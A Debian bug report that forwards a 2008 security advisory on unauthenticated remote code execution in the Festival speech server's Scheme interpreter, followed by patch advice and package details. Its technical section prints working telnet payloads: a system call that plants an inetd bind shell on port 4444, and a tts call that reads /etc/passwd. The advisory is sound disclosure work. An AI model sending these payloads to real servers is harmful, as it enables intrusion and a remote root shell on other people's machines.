Package: festival Version: 1.96~beta-5 Severity: critical Tags: security Justification: root security hole
Nth Dimension Security Advisory (NDSA20080215) Date: 15th February 2008 Author: Tim Brown <mailto:[EMAIL PROTECTED]> URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/> Product: Festival 1.96:beta July 2004 <http://www.cstr.ed.ac.uk/projects/festival.html> Vendor: Centre for Speech Technology Research, University of Edinburgh <http://www.cstr.ed.ac.uk/> Risk: Medium Summary The Festival server is vulnerable to unauthenticated remote code execution. Further research indicates that this vulnerability has already been reported as a local privilege escalation against both the Gentoo and SuSE GNU/Linux distributions. The remote form of this vulnerability was identified in 1.96~beta-5 as distributed in Debian unstable. Technical Details The Festival server which can be started using festival --server is vulnerable to unauthenticated remote command execution due to the inclusion of a scheme interpreter. It is possible to make use of standard scheme functions in order to execute further code, like so: $ telnet 10.0.0.1 1314 Trying 10.0.0.1... Connected to 10.0.0.1. (system "echo '4444 stream tcp nowait festival /bin/bash /bin/bash -i' > /tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf") Connection closed by foreign host. Whilst this is the most trivial way that the vulnerability can be exploited the inclusion of a scheme interpreter available without authentication allows for other vectors of attack. Scheme functions such as SayText and tts (which reads a file on the vulnerable system) pose particular interest, for example: $ telnet 10.0.0.1 1314 Trying 10.0.0.1... Connected to 10.0.0.1. (tts "/etc/passwd" nil) Whilst it is acknowledged that the inclusion of the scheme interpreter in this manner is entirely intentional, the default unsecure state of the server could be exploited particularly where the user is unaware of the servers existance. Solutions In order to completely protect against the vulnerability (in the short term), Nth Dimension recommend turning off the server or filtering connections to the affected port using a host based firewall. The server itself can be secured by applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477. This includes applying a default configuration which limits access to localhost and setting an optional password which prevents unauthenticated access. -- System Information: Debian Release: lenny/sid APT prefers oldstable APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages festival depends on: ii adduser 3.105 add and remove users and groups ii libaudiofile0 0.2.6-7 Open-source version of SGI's audio ii libc6 2.7-8 GNU C Library: Shared libraries ii libesd0 0.2.36-3 Enlightened Sound Daemon - Shared ii libestools1.2 1:1.2.96~beta-2 Edinburgh Speech Tools Library ii libgcc1 1:4.3-20080202-1 GCC support library ii libncurses5 5.6+20080203-1 Shared libraries for terminal hand ii libstdc++6 4.3-20080202-1 The GNU Standard C++ Library v3 ii lsb-base 3.1-24 Linux Standard Base 3.1 init scrip ii sgml-base 1.26 SGML infrastructure and SGML catal ii sysv-rc 2.86.ds1-53 System-V-like runlevel change mech Versions of packages festival recommends: ii festvox-kallpc16k [festival-v 1.4.0-5 American English male speaker for -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
